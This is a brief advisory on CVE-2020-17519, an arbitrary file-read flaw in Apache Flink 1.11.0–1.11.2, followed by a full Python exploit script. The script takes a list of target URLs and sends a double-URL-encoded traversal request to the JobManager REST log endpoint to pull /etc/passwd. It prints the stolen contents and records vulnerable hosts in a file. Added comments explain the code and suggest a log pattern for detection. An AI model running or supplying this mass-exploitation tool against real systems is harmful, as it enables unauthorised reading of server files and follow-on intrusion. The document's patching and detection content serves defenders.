Apache Flink 1.11.0–1.11.2 contains a flaw that allows an attacker to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. To avoid exploitation, users are advised to upgrade to Flink 1.11.3 or 1.12.0. The vulnerability is listed as CVE-2020-17519.
Exploit
#!/usr/bin/env python
# coding:utf-8
# author:B1anda0
#affected versions are Apache Flink 1.11.0-1.11.2
import requests,sys,colorama
from colorama import *
# colorama's init() resets terminal attributes after each print; the ANSI
# escape codes in the strings below are still written raw (no Fore/Style
# constants from the star import are used anywhere in this file).
init(autoreset=True)
# Banner printed once by the __main__ block; the leading escape sets the
# colour, the trailing newline-only line ends the literal.
banner='''\033[1;33;40m
_______ ________ ___ ___ ___ ___ __ ______ _____ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ |____ | ____/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | / /| |__ | | (_) |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| | / / |___ \ | |\__, |
| |____ \ / | |____ / /_| |_| / /_| |_| | | | / / ___) || | / /
\_____| \/ |______| |____|\___/____|\___/ |_|/_/ |____/ |_| /_/
'''
def verify():
    """Probe the module-level ``urls`` target for CVE-2020-17519 and record a hit.

    Takes no parameters: it reads the global ``urls`` that the ``__main__``
    loop assigns before each call. Sends a single GET to the JobManager REST
    log endpoint and, when the response is HTTP 200 and its body contains
    ``root:x``, prints the body and appends the target to ``./vul.txt``.
    Every exception is reported as a timeout (see the bare ``except`` below).
    """
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
    # Double URL-encoded traversal: ``%252f`` decodes to ``%2f`` and then to
    # ``/``. For detection, a request line for ``/jobmanager/logs/`` followed
    # by repeated ``%252f`` sequences is the artifact to alert on in
    # JobManager access logs or at a reverse proxy.
    payload= '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'
    poc=urls+payload
    try:
        # TLS verification is disabled (verify=False) and the resulting
        # urllib3 warning is silenced, so a bad certificate is not reported.
        requests.packages.urllib3.disable_warnings()
        response=requests.get(poc,headers=headers,timeout=15,verify=False)
        if response.status_code==200 and "root:x" in response.content:
            print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(urls))
            print(response.content)
            # Hit list is opened in append mode and never closed explicitly;
            # flushing relies on the handle being garbage-collected.
            f=open('./vul.txt','a')
            f.write(urls)
            f.write('\n')
        else:
            print('\033[1;32;40m[-]{} None'.format(urls))
    except:
        # Bare except: connection errors, HTTP-library errors and any
        # TypeError from the comparison above all land here, so this message
        # does not reliably mean a timeout occurred.
        print('{} request timeout'.format(urls))
if __name__ == '__main__':
    print (banner)
    # Exactly one argument is expected: a text file with one base URL per line.
    if len(sys.argv)!=2:
        print('Example:python CVE-2020-17519.py urls.txt')
    else:
        # Input file is never closed explicitly (no ``with``).
        file = open(sys.argv[1])
        for url in file.readlines():
            # ``urls`` is a module global consumed by verify(); a trailing
            # '/' is stripped so the payload path concatenates cleanly.
            urls=url.strip()
            # NOTE: a blank line yields an empty string and ``urls[-1]``
            # raises IndexError, aborting the whole run.
            if urls[-1]=='/':
                urls=urls[:-1]
            verify()
        print ('Check Over')